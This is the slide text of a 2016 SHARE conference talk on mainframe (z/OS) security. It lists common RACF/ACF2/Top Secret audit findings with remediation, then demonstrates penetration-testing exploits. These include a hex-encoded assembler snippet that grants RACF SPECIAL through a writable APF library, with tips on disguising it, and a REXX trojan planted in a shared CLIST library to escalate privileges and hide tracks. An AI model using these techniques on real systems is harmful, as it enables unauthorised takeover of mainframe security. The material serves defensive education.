2016 share the three headed beast v4

www.share.org/sanantonio-eval

http://creativecommons.org/licenses/by-nc-nd/3.0/

Kerberos or Cerberus? The Three Headed Monster of Mainframe Security,

Penetration Testing and Hacking

Brian Marshall, Mark Wilson & Chad Rikansrud

InsertCustomSessionQR ifDesired.

#19708



Agenda

The Top Five (or even Six) Assessment Findings• Brian Marshall: [email protected]

How to exploit One or Two of them• Mark Wilson: [email protected]

The Other World• Chad Rikansrud: [email protected]

Questions



Introduction – Brian Marshall● 20 years in Information Technology

● VP Research and Development for Vanguard Integrity Professionals

● Mainframe RACF specialist

● DOD DISA STIG specialist

● Father and Grandfather.

● Speaker at many events (ISACA, ISSA, SHARE, Vanguard)

● Short, but devilishly good looking.



TOP FIVETOP FIVE

TOP FIVE


http://creativecommons.org/licenses/by-nc-nd/3.0/ ©

Finding

Explanation

Risk

Recommended Best Practice and

Remediation

Started Task IDs are not Defined as PROTECTED in RACF, RESTRICT in ACF2, or in the STC Record in Top Secret.

User IDs associated with started tasks should be defined as such which will will exempt them from revocation due to inactivity or excessive invalid password attempts, as well as being used to sign on to an application.

The ESM will allow the user ID to be used for the started task even if it has become revoked, but some started tasks may either submit jobs to the internal reader that will fail or may issue a RACROUTE REQUEST=VERIFY macro for the user ID that will also fail.

Review all started task user IDs that are not protected. Determine if the user IDs are used for any other function that might require a password. Define the started task user IDs as “protected” for those tasks that do not require a password.

“Top Five” Assessment Finding #5



Finding

Explanation

Risk


Remediation

Critical data sets with ‘global access’ greater than READ

The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed.

Data sets that are protected by a ‘global access’ greater than READ will allow most users with system access to modify critical data residing in these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.

Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with greater than READ access.




Finding

Explanation

Risk


Remediation

Sensitive Data Sets with ‘global access’ Greater than NONE

The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed.

Data sets that are protected by ‘global access’ greater than NONE allow most users with system access to read or modify these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.

Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with the ‘global access’.




Finding

Explanation

Risk

Remediation

Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0

User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX directories and files and full authority to administer z/OS UNIX.

Since the UNIX environment is the z/OS portal for critical applications such as file transfers, Web applications, and TCPIP connectivity to the network in general, the ability of these superusers to accidentally or maliciously affect these operations is a serious threat. No personal user IDs should be defined with an OMVS segment specifying UID(0).

The assignment of UID(0) authority should be minimized by managing superuser privileges by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or access to one or more profiles in the UNIXPRIV class.




Finding

Explanation

Risk

Remediation

Excessive Number of User IDs with No Password Interval

User IDs with no password Interval are not required to change their passwords

Since passwords do not need to be changed periodically, people who knew a password for an ID could still access that ID even if they are no longer authorized users.

Review each of the personal user profiles to determine why they require no expiration. Their passwords should adhere to the company policy regarding password changes. If the user ID is being used for started tasks or surrogate, it should be reviewed and changed to the appropriate ESM privilege.




Finding

Explanation

Risk

Remediation

Excessive Access to APF Libraries

Authorized Program Facility (APF) libraries are in integral part of the z/OS architecture to enable maintenance of the integrity of the z/OS operating system environment. Libraries designated as APF allow programs to execute with the authority of z/OS itself, so the ability to modify these libraries must be strictly controlled.

UPDATE or higher access to an APF library can allow an individual to create an authorized program which can bypass security controls and execute privileged instructions. UPDATE or higher access should be limited to senior systems support staff.

Review the protection of all APF libraries and remove or change inappropriate access list entries and ensure that all IUPDATE activity is logged to SMF.

©2015 Vanguard Integrity Professionals, Inc. All Rights Reserved. You have a limited license to view these materials for your organization’s internal purposes.

Any unauthorized reproduction, distribution, exhibition or use of these copyrighted materials is expressly prohibited.

“The Worst” Assessment Finding



Top Ten Critical Assessment Findings in Mainframe Environments74% Excessive Number of User ID’s with no Password Interval SEVERE

60% Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0 SEVERE

54% Sensitive Data Sets with ‘global access’ Greater than NONE SEVERE

54% Critical Data Sets with ‘global access’ Greater than READ HIGH

53% Started Task IDs are not Defined as ‘protected’ IDs HIGH

52% Improper Use or Lack of UNIXPRIV Profiles HIGH

44% Excessive Access to the SMF Data Sets HIGH

42% Excessive Access to APF Libraries SEVERE

42% Excessive Access to z/OS UNIX File System Data Sets HIGH

40% ESM Database(s) is not Adequately Protected SEVERE

10/14/15



Time to handover to …...



Introduction – Mark Wilson● Technical Director at RSM Partners● Been in IT for over 36 Years….● I lead the Technical team at RSM that amounts to just over 60

technicians….yes it’s a lot of fun!!...most of the time● IT Security in particular mainframes is my specialist subject



Getting the language right● Penetration Testing

– Done by the good people out there to stop the bad folks getting in

– This is the bit I enjoy the most● Hacking

– The bad guys or gals…… its not necessarily a male dominated activity these days

– They are after our stuff….



Getting the language right● Vulnerability Scanning

– Scanning the code delivered by IBM and ISV’s along with any code you may have developed yourself

– Test the code to see if it has any vulnerabilities that could be exploited by a knowledgably user



Getting the language right● Auditing

– The process of checking that we are doing everything correctly

– These are the good guys and are here to help– Work with them not against them– Educate them, don’t shun them…we all had to start

somewhere– How many IT Auditors actually understand what we do?



Poorly protected APF lib’s● Very simple exploit● It not uncommon to find hundreds of users having update access

to APF authorised libraries……● What's most alarming is that the client site(s) typically has 10 or

less system programmers● Having update authority to an APF authorised library means I can

write my own authorised code and run it undetected



Poorly protected APF lib’s● May ways to find the list of APF Authorised libraries

– ISRDDN, IPLINFO REXX Exec, TASID, etcOr write your own● TSO ISRDDN

– APF– ONLY APF– MEM FRED

● TSO IPLINFO APF – If you have installed IPLINFO REXX



Excessive Access to APF Libraries● Once you have found an APF library you can update…

● Then the following manual sometimes can help



Just a Bit of Code… Honest A START

DC X'411000300A6B58F0021CBFFFF154A774000858F0022458FF006C58FF00C896'

DC X'80F02617FF07FE'

END A



Now the good bit!● Assemble and linkedit the code shown with AC(1)

● Place in an APF library with any name you want (LURACF)

● Run the program as a two step batch job…

– The first to call this program (PGM=LURACF)– The second to issue any RACF command you want!



Now the good bit!● Why/How does this work?

● Well that little bit of code flipped a flag in my ACEE to turn on the RACF SPECIAL flag for my instorage ACEE

● This can be modified so that it looks very innocent, e.g. part of a translate table, or it can be rewritten in a virus-type manner, making it more difficult to disassemble



Lets do it!



CLIST/REXX Issues● We quite often see CLIST/REXX Libraries that are universally

updateable that are not at the bottom of the list of concatenated datasets for SYSPROC or SYSEXEC

● Simply find an exec that is lower down in the concatenation that is used by one of the privileged users (Sec Admin, Sysprog, etc)

● Copy an exec to the universally accessible dataset and add a bit of your own code



CLIST/REXX Issues● An Example● When doing a Pen test we determined that we had UPDATE

authority to a CLIST/REXX Library allocated and used each time we logged on to TSO…the dataset was called USER.CLIST

● Add to this the fact that

– All users via their Logon Proc call the same exec WBA001● A simple update to WBA001 to call a little piece of code….● And then just sit and wait….



CLIST/REXX Issues

Added this line here



CLIST/REXX IssuesThe contents of USER.CLIST(MYCMD)/* REXX */

/***************************************************/

/* Trap the responses so no messages issued to the */

/* user as they logon…. */

/***************************************************/

TEMP = OUTTRAP(LINE.)/* is this the user I want to exploit?? */

UID =sysvar(sysuid)/* If so get THEM to issue the command you want */

IF UID = CHAD or BRIAN then do address tso alu MY_HACKER_ID SPECIAL OPERATIONSEnd

Could use a prefix (SUBSTR) for a group of

users!



CLIST/REXX Issues● So why pick on CHAD or BRIAN?

– We determined from looking at the syslog and output on the Q that CHAD and BRIAN were RACF SYSTEM SPECIAL

● So the next time either of them logs onto the system any command entered into mycmd is run…game over….

● I can even cover my tracks my resetting the ISPF stats to show another userid having last changed WBA001 and MYCMD

● Imagine if I changed it to CHAD or BRIAN!!



Time to handover to …...



Introduction – Chad Rikansrud

• 20 Years in Information Technology• Networking Protocols / Forensics• Programming (Assembler, C, Python, others)• Security & Security Research (z/OS, x86_64)

– Contributor to open source projects:• Metasploit, r2 disassembly framework, scrypt

• Cryptography implementations / protocols• Capture the Flag builder (BSides DFW,MSP)• Speaker at DEF CON, Derbycon, MN SEC, Others



How the bad guys think● Let’s assume 3 types of attackers:

– No mainframe knowledge, but skilled at exploits / other OS’s

– Some mainframe knowledge, also skilled at other OS’s

– Mainframe knowledge + hacking skills

● Look at 3 possible attacks (based on the above)

– JAVA deserialization / poor configuration (works out of the box)

– Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL

– SMP/E injection & Forgery



Attack #1 - JAVA

Java• Gift that keeps giving • Combination of inherent vulnerabilities (Fixed with patching

SMP/E, etc) and poorly written code.• Deserialization attacks (Common Libraries / Bad code)• Java takes care of the Code Page issues (Good for you/Good for

them!)

Java Exploit Demo





Attack #2 – JCL over FTP w/Stolen Creds

JCL over FTP• Fantastic way to remotely exploit system with given creds.• How to get creds (Sniff wire, MITM Self-Signed Cert).• How to submit reliable JCL over FTP (Metasploit)• What to submit? (Shells, pull password database, etc.)

JCL over FTP demo





Attack #3 – SMP/E Forgery

SMP/E• Lots of controls around RACF authorization for SMP/E commands• What about the Files / Libraries?

• OMVS /smpnts directory?• z/OS SMPPTS libraries• Global / Target / Distribution zones

• Insert code to build Load Module / Replace an Exit / Backdoor ?

SMP/E Forgery Demo





Summary - Attacks● Don’t presume that attacks built for ‘nix / Windows can’t be

repurposed

– Sometimes they work out of the box– Occasionally require a little retooling / build tools to make

easier– Some work in theory – but require in depth knowledge.– All can make your life miserable



Summary - Attacks● Remediation

– Secure your SMP/E libraries (See Brian’s notes on insecure libraries)

– Lock down FTP configuration.– Strong Passwords + 2-factor authentication < - - - - - This

mitigates many issues.– Secure coding training / practice. (Esp. Java



Questions



Related Sessions Session # Session Title Date and Time Room Speaker(s)

19683 RACF Monitoring & Reporting2016-08-02, 12:30:00 L402 Robert S. Hansel

19639 RACF Update2016-08-03, 08:30:00 L401 Mark Nelson, Julie A. Bergh

19638 CA ACF2 & CA Top Secret Update - R16 is Finally Here!2016-08-03, 10:00:00 L401 Carla Flores

19612HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and Routing to Linux on z 2016-08-03, 11:15:00 A601 Linda Harrison

19646RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect Combination!

2016-08-03, 13:45:00 L402 Mark Nelson, Julie A. Bergh

19782 Experiences with Two Factor Authentication (2FA) on z/OS2016-08-03, 15:15:00 A704 Gary Morgan, Steve Brinkley

19464 Encryption? Yeah, We Do That2016-08-04, 10:00:00 L505 Phil Smith III

19389 Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure?2016-08-04, 10:00:00 A602 Leigh Compton

19655Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key Archival Using ICSF (Integrated Cryptographic Service Facility)

2016-08-04, 13:45:00 A601 Eysha Shirrine Powers

19241 z/OS Communications Server Security Using Policy Agent2016-08-04, 13:45:00 L401 Linda Harrison

19804 PAGENT & RACF: Security from within the Black Box and Beyond2016-08-04, 16:30:00 L508

Brian Marshall, Marlaina Chirdon

19239 Safe and Secure Transfers with z/OS FTP2016-08-04, 16:30:00 L402 Chris Meyer; Sam Reynolds

19424 A New Look at Mainframe Hacking and Penetration Testing2016-08-05, 08:30:00 L402 Mark Wilson

19765SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as Airplanes 2016-08-05, 11:15:00 A702 Mark Nelson



Thank You for Attending!

Please remember to complete your evaluation in the SHARE mobile app.

#19708